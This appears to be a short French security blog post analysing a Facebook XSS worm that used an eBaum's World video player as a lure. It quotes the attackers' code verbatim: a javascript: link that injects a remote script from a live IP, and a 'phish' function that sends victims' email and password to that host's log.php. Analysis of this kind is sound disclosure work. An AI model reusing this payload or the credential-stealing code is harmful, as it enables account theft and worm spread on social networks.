Vulnérabilité Facebook: Spam & Hameçonage, Facebook,Javascript,XSS,eBaum's World,Video,Spam,Phish,Stealer Options

[CybStup]

Il y a quelques jours, un ver informatique s'est propagé en exploitant une vulnérabilité de type XSS sur facebook.
Aujourd'hui, une nouvelle vulnérabilité a été exploitée pour lire automatiquement une vidéo à l'aide d'un lecteur personnalisé hébergé sur eBaum's World avec une surprise à la clé.
La charge utile malveillante utilisée sur ce XSS est particulièrement soignée ; bien loin de l'habituelle et gentille méthode alert()

<a href=" javascript:if(window.opener){ window.opener.document.body.appendChild(document.createElement('script')).src='http://173.231.144.82/fb.js?like_link=http://www.pinkweddingfavors.info/bullypal/&amp;app_link=http://apps.facebook.com/palpushesbully/&amp;embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&amp;im_text=haha! hilarous'; window.close(); }else{ document.body.appendChild(document.createElement('script')).src='http://173.231.144.82/fb.js?like_link=http://www.pinkweddingfavors.info/bullypal/&amp;app_link=http://apps.facebook.com/palpushesbully/&amp;embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&amp;im_text=haha! hilarous'; }" target="_blank"><img src="http://i.imgur.com/8hZd5.png" border="0" /></a>

source: http://apps.facebook.com/palpushesbully/

http://edge.ebaumsworld.com/crossdomain.xml

Code

<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*.www.media.ebaumsworld.com" />
  <allow-access-from domain="*media.ebaumsworld.com" />
</cross-domain-policy>

http://edge.ebaumsworld.com/mediaFiles/video/1564429/81417366.mp4

La vidéo n'était qu'un leurre,...

function phish(email, pass){
var log = new Image();
log.src = 'http://173.231.144.82/log.php?email=' + email + '&pass=' + pass;
}

Pour plus d'infos techniques, consulter: http://pastebin.com/73xfQ2wj

nb: 173.231.144.82 est une machine VoxCLOUD de chez Voxel.